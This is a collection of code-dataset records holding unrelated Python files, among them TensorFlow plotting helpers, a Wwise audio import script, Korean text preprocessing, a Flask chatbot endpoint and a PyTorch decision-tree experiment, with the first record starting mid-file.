num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n self.plot_example_errors(data=data, cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n self.plot_confusion_matrix(data=data, num_classes=num_classes, cls_pred=cls_pred)\n\n\n def plot_confusion_matrix(self, data, num_classes, cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = data.test.cls\n\n # Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(num_classes)\n plt.xticks(tick_marks, range(num_classes))\n plt.yticks(tick_marks, range(num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_example_errors(self, data, cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = data.test.cls[incorrect]\n\n # Plot the first 9 images.\n self.plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n\n def plot_weights(self, session, weights, img_shape=(28,28)):\n # Get the values for the weights from the TensorFlow variable.\n w = session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Create figure with 3x4 sub-plots,\n # where the last 2 sub-plots are unused.\n fig, axes = plt.subplots(3, 4)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Only use the weights for the first 10 sub-plots.\n if i<10:\n # Get the weights for the i'th digit and reshape it.\n # Note that w.shape == (img_size_flat, 10)\n image = w[:, i].reshape(img_shape)\n\n # Set the label for the sub-plot.\n ax.set_xlabel(\"Weights: {0}\".format(i))\n\n # Plot the image.\n ax.imshow(image, vmin=w_min, vmax=w_max, cmap='seismic')\n\n # Remove ticks from each sub-plot.\n ax.set_xticks([])\n ax.set_yticks([])\n \n def plot_conv_weights(self, session, weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i\"\n\n # \"\\\\Actor-Mixer Hierarchy\\\\Script Import\\\\Test 0\\\\Container 0\\\\My SFX 0\"\n if baseDirName:\n objectPath = \"\"+baseDirName+\"\\\\\"\n else:\n objectPath = \"\"\n\n sectionActorMixer = \"\"+MyComponent.INPUT_SectionName+\"\\\\\"\n\n importFilelist.append(\n {\n \"audioFile\": fileList,\n #\"objectPath\": \"\"+os.path.basename(audiofilename\n \"objectPath\": sectionActorMixer + objectPath + objectType + os.path.basename(audiofilename)\n #\"objectPath\": \"\" + os.path.basename(audiofilename)\n }\n )\n MyComponent.importArgs = {\n \"importOperation\": \"useExisting\",\n \"default\": {\n \"importLanguage\": MyComponent.ImportLanguage,\n \"importLocation\": ParentID,\n \"originalsSubFolder\": originalsPath+originalsSubDir,\n \"notes\":\"This object was auto imported\",\n \"@IsStreamingEnabled\": MyComponent.OPTION_IsStreaming,\n \"@IsZeroLantency\": MyComponent.OPTION_IsStreaming,\n \"event\": eventPath+\"\\\\\"+os.path.basename(audiofilename)+\"@Play\"\n #,\"ErrorTest\":\"Failme\"\n },\n \"imports\": importFilelist,\n #\"autoAddToSourceControl\": True #not yet supported\n }\n\n def importAudioFiles(args):\n try:\n yield from self.call(WAAPI_URI.ak_wwise_core_audio_import, {}, **args)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n MyComponent.ImportOperationSuccess = False\n cancelUndoGroup()\n else:\n MyComponent.ImportOperationSuccess = True\n\n def SetupImportParentObject(objectName):\n # Setting up the import parent object\n arguments = {\n \"from\": {\"path\": [\"\\Actor-Mixer Hierarchy\"]},\n \"transform\": [\n {\"select\":['descendants']},\n {\"where\": [\"name:matches\", objectName]}\n ],\n \"options\": {\n \"return\": [\"id\",\"type\", \"name\", \"path\"]\n }\n }\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_object_get, **arguments)\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n cancelUndoGroup()\n else:\n ID = \"\"\n obj = \"\"\n path = \"\"\n for x in res.kwresults[\"return\"]:\n if x[\"type\"] == \"WorkUnit\":\n ID = str(x[\"id\"])\n obj = x\n path = str(x[\"path\"])\n MyComponent.parentObject = obj\n MyComponent.parentObjectPath = path\n MyComponent.parentID = ID\n\n def ImportIntoWwiseUnderParentObject(parentObjectID):\n # subscribe to selection change?\n #print(\"Method to get the parent to create new object under\")\n success = False\n parID = parentObjectID\n\n #print(\"Selected object is...\")\n if parID != None:\n success = True\n if success:\n yield from getExistingAudioInWwise(str(parID))\n createExistingAudioList(MyComponent.WwiseQueryResults)\n setupAudioFilePath()\n count = 0\n for file in MyComponent.ImportAudioFileList:\n #print(file)\n f = file.rsplit('.')\n fname = os.path.basename(f[0])\n if not fname in MyComponent.ExistingWwiseAudio:\n yield setupImportArgs(parID, file, MyComponent.DefaultOriginalsPathForNewFiles)\n yield from importAudioFiles(MyComponent.importArgs)\n count += 1\n MyComponent.ImportOperationSuccess = True\n\n else:\n print(\"Something went wrong!!\")\n MyComponent.ImportOperationSuccess = False\n return\n\n if (MyComponent.ImportOperationSuccess):\n saveWwiseProject()\n endUndoGroup()\n print(\"Import operation success. \"+str(count)+\" new files imported.\")\n else:\n print(\"Import operation failed! Check log for errors!\")\n endUndoGroup()\n\n################### Main script flow ###################\n #### Establish Wwise connection\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_getinfo) # RPC call without arguments\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n # Call was successful, displaying information from the payload.\n print(\"Hello {} {}\".format(res.kwresults['displayName'], res.kwresults['version']['displayName']))\n\n absPathToScript = \"\"\n\n #### If the sys args are longer than the default 1 (script name)\n if (len(sys.argv) > 1):\n if(len(sys.argv)) >= 2:\n setupBatchFileSysArgs()\n else:\n print(\"ERROR! Not enough arguments\")\n\n print(\"Arguments passed in...\"+str(sys.argv))\n currentWorkingDir = os.getcwd()\n print(\"Current Working Directory = \" + currentWorkingDir)\n\n\n yield from getProject()\n\n yield from getDefaultLanguage()\n\n #### Construct the import audio file path. Use Section name from args\n ## Construct the path down to the Originals section folder containing the files to import\n\n pathToOriginalFiles = os.path.join(MyComponent.pathToWwiseProject, *MyComponent.pathToOriginalsFromProjectRoot)\n pathToSectionFiles = os.path.join(pathToOriginalFiles,MyComponent.INPUT_SectionName)\n MyComponent.ImportAudioFilePath = os.path.abspath(pathToSectionFiles)\n\n\n\n\n\n\n if MyComponent.ImportAudioFilePath == '':\n print(\"Error. Directory not selected. Exiting application.\")\n self.leave()\n return\n\n beginUndoGroup()\n\n ## Get the Section work unit object and store ID and path\n yield from SetupImportParentObject(MyComponent.INPUT_SectionName)\n\n ## Main import function - Takes the ID of an object, to import files under.\n ## This method calls several other methods as it executes\n yield from ImportIntoWwiseUnderParentObject(MyComponent.parentID)\n\n exit()\n\n\n\n def onDisconnect(self):\n print(\"The client was disconnected.\")\n\n asyncio.get_event_loop().stop()\n\n\nif __name__ == '__main__':\n runner = ApplicationRunner(url=u\"ws://127.0.0.1:8095/waapi\", realm=u\"realm1\")\n try:\n runner.run(MyComponent)\n except Exception as e:\n print(type(e).__name__ + \": Is Wwise running and Wwise Authoring API enabled?\")\n","sub_path":"VoLAMSAutoImport/ImportNewAudioFilesAsDialogue_VR2_automated.py","file_name":"ImportNewAudioFilesAsDialogue_VR2_automated.py","file_ext":"py","file_size_in_byte":15046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525659577","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright 2018 NAVER Corp.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and\nassociated documentation files (the \"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial\nportions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\nPARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\nCONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport os\nimport re\n\nimport numpy as np\n\nfrom scipy.sparse import hstack\nfrom konlpy.tag import Twitter\n\nclass MovieReviewDataset():\n \"\"\"\n 영화리뷰 데이터를 읽어서, tuple (데이터, 레이블)의 형태로 리턴하는 파이썬 오브젝트 입니다.\n \"\"\"\n def __init__(self, dataset_path: str):\n \"\"\"\n initializer\n :param dataset_path: 데이터셋 root path\n :param max_length: 문자열의 최대 길이\n \"\"\"\n # 데이터, 레이블 각각의 경로\n data_review = os.path.join(dataset_path, 'train', 'train_data')\n data_label = os.path.join(dataset_path, 'train', 'train_label')\n\n # 영화리뷰 데이터를 읽고 preprocess까지 진행합니다\n with open(data_review, 'rt', encoding='utf-8') as f:\n self.reviews = f.readlines()\n\n # 영화리뷰 레이블을 읽고 preprocess까지 진행합니다.\n with open(data_label) as f:\n self.labels = [np.float32(x) for x in f.readlines()]\n\n\ndef regexp(texts):\n twt = Twitter()\n container = []\n for i, sent in enumerate(texts):\n if i % 200000 == 0:\n print(i)\n sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n sent = re.sub('\\.{2,}', ' .. ', sent)\n sent = re.sub('\\~+', ' ~ ', sent)\n sent = re.sub('\\!+', ' ! ', sent)\n sent = re.sub('\\?+', ' ? ', sent)\n sent = re.sub('(ac)', ' 99', sent)\n sent = re.sub('(mv)', ' 88', sent)\n sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n container.append(\" \".join(twt.morphs(sent)))\n return container\n\ndef word_preprocessor(sent):\n twt = Twitter()\n sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n sent = re.sub('\\.{2,}', ' .. ', sent)\n sent = re.sub('\\~+', ' ~ ', sent)\n sent = re.sub('\\!+', ' ! ', sent)\n sent = re.sub('\\?+', ' ? ', sent)\n sent = re.sub('(ac)', ' 99', sent)\n sent = re.sub('(mv)', ' 88', sent)\n sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n sent = \" \".join(twt.morphs(sent))\n return sent\n\ndef char_preprocessor(sent):\n sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n sent = re.sub('\\.{2,}', '..', sent)\n sent = re.sub('\\~+', '~', sent)\n sent = re.sub('\\!+', '!', sent)\n sent = re.sub('\\?+', '?', sent)\n sent = re.sub('(ac)', '', sent)\n sent = re.sub('(mv)', '', sent)\n sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n sent = re.sub('[1234567890]', '', sent)\n return sent\n\n# 144570\ndef trn_val_seperation(dataset: list, bound: int):\n bound = -1 * bound\n X_trn = dataset.reviews[:bound]\n X_val = dataset.reviews[bound:]\n Y_trn = dataset.labels[:bound]\n Y_val = dataset.labels[bound:]\n\n return X_trn, X_val, Y_trn, Y_val\n \ndef vect_fit(review, vect_word, vect_char):\n vect_word.fit(review)\n vect_char.fit(review)\n return vect_word, vect_char\n\ndef vect_transform(review, vect_word, vect_char):\n df_word = vect_word.transform(review)\n df_char = vect_char.transform(review)\n return hstack([df_word, df_char]).tocsr()","sub_path":"movie-review_phase2/model_lr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605705274","text":"import json\n\n\ndef modifyDictionarywithVariants(dictionary, variant_files):\n variants = dict()\n for file in variant_files:\n with open(file) as json_file:\n variants.update(dict(json.load(json_file)))\n for key in variants.keys():\n for variant in variants[key]:\n try:\n dictionary[variant.lower()] = dictionary[key].lower()\n except:\n continue\n return dictionary","sub_path":"database/variants.py","file_name":"variants.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99378112","text":"x = int(input())\n\nfor a in range(x + 1):\n for b in range(a):\n if a ** 5 - (b ** 5) == x:\n print(a, b)\n break\n elif a ** 5 - ((-b) ** 5) == x:\n print(a, b)\n break\n","sub_path":"ABC/abc166/abc166_d.py","file_name":"abc166_d.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211681547","text":"\"\"\"extra traitlets\"\"\"\n# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nfrom IPython.utils.traitlets import Unicode\n\nclass URLPrefix(Unicode):\n def validate(self, obj, value):\n u = super().validate(obj, value)\n if not u.startswith('/'):\n u = '/' + u\n if not u.endswith('/'):\n u = u + '/'\n return u\n","sub_path":"jupyterhub/traitlets.py","file_name":"traitlets.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70847102","text":"#How much change should be given to buyer?\n\n#product cost\na = input(\"Product cost whole: \")\nb = input(\"Product cost trifle: \")\n\n#money get from buyer\nc = input(\"whole: \")\nd = input(\"trifle: \")\n\nif (a > 0 and c > 0) or (0 < a == 0 < c):\n x = a - c\n print (abs(x))\nelse:\n print ('0')\nif 0 < b != 0 < d:\n y = b - d\n print (abs(y))\nelif b > 0 and d == 0:\n y = b - 100\n print (abs(y))\nelif b == 0 and d > 0:\n y = 100 - d\n print (y)\nelse:\n print ('0')\n","sub_path":"Informatics/Boolean/Change.py","file_name":"Change.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243897223","text":"# -*- coding: utf-8 -*-\n\"\"\"This module provides a function for getting the building ID from the\n(preprocessed) street address attribute.\n\"\"\"\nimport numpy as np\nimport pandas as pd\n\ndef get_building_from_street_address(dataset):\n \"\"\"Returns a DataFrame of the listings building ID calculated from\n the listings street address, which can be used to fill missing\n values.\n \"\"\"\n # Get each street addresses corresponding building ID.\n address_building_ids = {}\n\n # For each valid building ID (ie not NaN), get the street addresses\n # of the apartments in that building.\n for building_id in dataset.building_id[pd.notna(dataset.building_id)].unique():\n listings_in_building = dataset[dataset.building_id == building_id]\n\n # Only unique addresses.\n addresses = list(set(listings_in_building.street_address_preprocessed.values))\n\n # Add each valid address to the dictionary, mapping to the current\n # building ID.\n for addr in addresses:\n if addr and pd.notna(addr):\n address_building_ids[addr] = building_id\n\n def get_id(address):\n \"\"\"Returns the street addresses corresponding building ID.\"\"\"\n try:\n return address_building_ids[address]\n except KeyError:\n return np.nan\n \n building_ids_by_address = pd.DataFrame(\n index=dataset.index,\n data=dataset.street_address_preprocessed,\n columns=['street_address_preprocessed']\n )\n building_id_estimates = building_ids_by_address.street_address_preprocessed.apply(get_id)\n return building_id_estimates\n","sub_path":"src/preprocessing/building_id_by_street_address.py","file_name":"building_id_by_street_address.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"616347150","text":"#!/usr/bin/python\n# Proyecto: BIOIN\n# Trabajo de Grado\n# Alejandro Valencia R.\n# Juan Jose Varela V.\n# Universidad del Valle\n\n# librerias a importar\nimport subprocess as sp\nimport shlex as sl\nimport webbrowser\nimport threading\n\n\nclass Browser:\n\n def __init__(self, project):\n self.project = project\n\n def worker(self):\n comando2 = \"python3 -m http.server 8081\"\n args2 = sl.split(comando2)\n sp.call(args2)\n\n def ejecutCommand(self):\n # comando = \"cd /nucleotidesModule/genomeBrowsers/kablammo\"\n # args = sl.split(comando)\n # sp.call(args)\n # montaje de servidor en segundo plano para no detener la interfaz\n thread = threading.Thread(target=self.worker)\n thread.start()\n url = \"http://localhost:8081/nucleotidesModule/genomeBrowsers/kablammo/\"\n webbrowser.open(url)\n # guardamos en una variable el comando a ejecutar\n # comando = \"./nucleotidesModule/genomeBrowsers/JBrowse-1.16.4-desktop-linux-x64/JBrowse-1.16.4-desktop\"\n\n # convertimos el string en una lista para poder pasar de manera adecuada los comandos desde python\n # args = sl.split(comando)\n\n # ejecutamos la función call de subprocess que permite ejecutar comandos desde la temrinal\n # sp.call(args)\n","sub_path":"BIOIN_0_1/src/nucleotidesModule/genomeBrowsers/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23461287","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2007 - 2014 -- Lars Heuer - Semagia .\n# All rights reserved.\n#\n# BSD license.\n#\n\"\"\"\\\nSetup script for deserializer.\n\"\"\"\ntry:\n from setuptools import setup, find_packages\n from setuptools.command.sdist import sdist as _sdist\nexcept ImportError:\n from ez_setup import use_setuptools\n use_setuptools()\n from setuptools import setup, find_packages\n\n\nclass sdist(_sdist):\n def make_release_tree(self, basedir, files):\n from tm import plyutils\n import sys\n sys.path[0:0] = ['.', '..']\n from mio.ltm import lexer, parser\n plyutils.make_lexer(lexer)\n plyutils._make_parser_for_sdist(parser)\n files.extend(['mio/ltm/lexer_lextab.py', 'mio/ltm/parser_parsetab.py'])\n _sdist.make_release_tree(self, basedir, files)\n\n\nsetup(\n name='mio.ltm',\n version='0.1.5',\n description='Linear Topic Maps (LTM) syntax reader',\n long_description='\\n\\n'.join([open('README.txt').read(), open('CHANGES.txt').read()]),\n author='Lars Heuer',\n author_email='mappa@googlegroups.com',\n url='http://mappa.semagia.com/',\n license='BSD',\n packages=find_packages(),\n namespace_packages=['mio'],\n entry_points=\"\"\"\n [mio.reader]\n ltm = mio.ltm\n \"\"\",\n platforms='any',\n zip_safe=False,\n include_package_data=True,\n package_data={'': ['*.txt']},\n cmdclass={'sdist': sdist},\n install_requires=['tm>=0.1.7'],\n keywords=['Topic Maps', 'Semantic Web', 'LTM'],\n classifiers=[\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Topic :: Software Development',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ]\n)\n","sub_path":"mio.ltm/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"410701686","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api\nfrom chatbot import chatbot_api\n\n\napp = Flask(__name__)\napi = Api(app)\nfelix = None\n\n@app.route('/', methods=['POST']) #allow both GET and POST requests\ndef form_example():\n if request.method == 'POST': #this block is only entered when the form is submitted\n req_data = request.get_json()\n sentance = req_data['input']\n output = felix.predict(sentance)\n return jsonify(\n reply=output,\n )\n\n\nif __name__ == '__main__':\n felix = chatbot_api.Chatbot()\n felix.run()\n app.run(port='5002')","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32298242","text":"import torch\nfrom torch import nn\n# create training dataset\ntrain_dataset=[[0, 0, 0, 0, 0, 0, 1],[1, 0, 1, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 1],[0, 0, 1, 0, 0, 0 ,1],\n [2, 0, 0, 0, 0, 0, 1],[0, 1, 0, 0, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],[1, 1, 0, 0, 1, 0, 1],\n [1, 1, 1, 1, 1, 0, 0],[0, 2, 2, 0, 2, 1, 0],\n [2, 2, 2, 2, 2, 0, 0],[2, 0, 0, 2, 2, 1, 0],\n [0, 1, 0, 1, 0, 0, 0],[2, 1, 1, 1, 0, 0, 0],\n [1, 1, 0, 0, 1, 1, 0],[2, 0, 0, 2, 2, 0, 0],\n [0, 0, 1, 1, 1, 0, 0]\n]\n\n\ndef one_hot(input_data):\n # load data into torch and change the data's dimension(turn M×n into n×M)\n input_data_copy = torch.tensor(input_data).t()\n # get the numbers of data and data's feature\n feature_num, data_num = input_data_copy.shape\n # create a tenosr to save output\n output_X = torch.tensor([])\n for i in range(feature_num - 1): # the last dimension is result\n # compute the feature_i's dimension after one-hot\n output_X_i_shape = data_num, int(input_data_copy[i].max().item())+1\n output_X_i = torch.zeros(output_X_i_shape, dtype=torch.float).scatter_(1, input_data_copy[i].view(-1,1), 1)\n output_X = torch.cat((output_X, output_X_i), 1) # put the two matrix together\n # get the label of each data\n output_y = input_data_copy[-1].view(-1, 1) * 2 - 1\n return output_X, output_y.float()\n\n# test one_hot function\ntrain_X, train_y = one_hot(train_dataset)\nprint(train_X.shape) # 17×(3+3+3+3+3+2)\nprint(train_y.shape) # 17×1\n\n# add density and sugar content\nnew_feature = torch.tensor([[0.697, 0.460], [0.774, 0.376], [0.634, 0.264], [0.608, 0.318],\n [0.556, 0.215], [0.403, 0.237], [0.481, 0.149], [0.437, 0.211],\n [0.666, 0.091], [0.243, 0.267], [0.245, 0.057], [0.343, 0.099],\n [0.639, 0.161], [0.657, 0.198], [0.360, 0.370], [0.593, 0.042],\n [0.719, 0.103]\n])\ntrain_X = torch.cat((train_X, new_feature), 1)\nprint(train_X.shape)\n\ndef Loss(y_hat, y):\n tmp = y * y_hat\n l = (tmp < 0).float() * tmp\n return abs(l).sum()\ndef createModel(input_channel, output_channel):\n net = nn.Sequential(\n nn.Linear(input_channel, output_channel)\n )\n return net\n\nclass TreeNode():\n def __init__(self, model=None, predicted=-1, left=None, right=None):\n self.model = model\n self.predicted = predicted\n self.left = left\n self.right = right\n\n\ndef train(net, train_X, train_y, epochs, lr, print_frequence=0):\n optim = torch.optim.SGD(net.parameters(), lr=lr)\n for epoch in range(epochs):\n optim.zero_grad()\n y_hat = net(train_X)\n l = Loss(train_y, y_hat)\n l.backward()\n optim.step()\n if print_frequence:\n if (epoch + 1) % print_frequence == 0:\n print(\"epoch:%d, loss:%f\" % (epoch, l.item()))\n print(\"epoch:%d, accuracy:%0.2f%%\\n\" % (epoch, evaluate(net, train_X, train_y)))\n\n\ndef evaluate(net, train_X, train_y):\n y_hat = net(train_X)\n y_hat = (y_hat >= 0).float() * 2 - 1\n accuray = 100 * (y_hat == train_y).sum().float() / len(train_y)\n return accuray\n\ndef createTree(tree, train_X, train_y, epochs, lr, precision):\n if len(train_y) == 0:\n return None\n tree.model = createModel(train_X.shape[1], train_y.shape[1])\n train(tree.model, train_X, train_y, epochs, lr)\n # binnary training set according to predicted value\n train_set = binaryTrainSet(tree.model, train_X, train_y)\n # create left subtree\n if len(train_set[0][1]) == 0 or evaluate(tree.model, train_set[0][0], train_set[0][1]) > precision:\n tree.left = TreeNode(predicted=0)\n else:\n tree.left = TreeNode()\n createTree(tree.left, train_set[0][0], train_set[0][1], epochs, lr, precision)\n\n # create right subtree\n if len(train_set[1][1]) == 0 or evaluate(tree.model, train_set[1][0], train_set[1][1]) > precision:\n tree.right = TreeNode(predicted=1)\n else:\n tree.right = TreeNode()\n createTree(tree.right, train_set[1][0], train_set[1][1], epochs, lr, precision)\n\ndef binaryTrainSet(net, train_X, train_y):\n y_hat = net(train_X)\n train_set = [[torch.tensor([]), []] for _ in range(2)] # create a empty list to store result\n for index in range(len(train_y)):\n class_id = int(y_hat[index] >= 0)\n train_set[class_id][0] = torch.cat((train_set[class_id][0], train_X[index].view(1, -1)), 0)\n train_set[class_id][1].append(train_y[index].item())\n for i in range(2):\n train_set[i][1] = torch.tensor(train_set[i][1], dtype=torch.float).view(-1, 1)\n return train_set\n\n\ntree = TreeNode()\ncreateTree(tree, train_X, train_y, 200, 0.01, 90)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"机器学习/机器学习-决策树/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397487511","text":"# -*- coding: utf-8 -*-\n# \n# Archéo Lex – Pure Histoire de la Loi française\n# – crée un dépôt Git des lois françaises écrites en syntaxe Markdown\n# – ce fichier sert de base au module et gère la journalisation\n# \n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. See\n# the LICENSE file for more details.\n\n# Imports\nimport logging\nfrom logging.config import dictConfig\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'logging.NullHandler',\n },\n 'console':{\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'peewee': {\n 'handlers': ['null'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\ndictConfig(LOGGING)\n\nlogger = logging.getLogger(__name__)\n\n","sub_path":"lexarcheo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}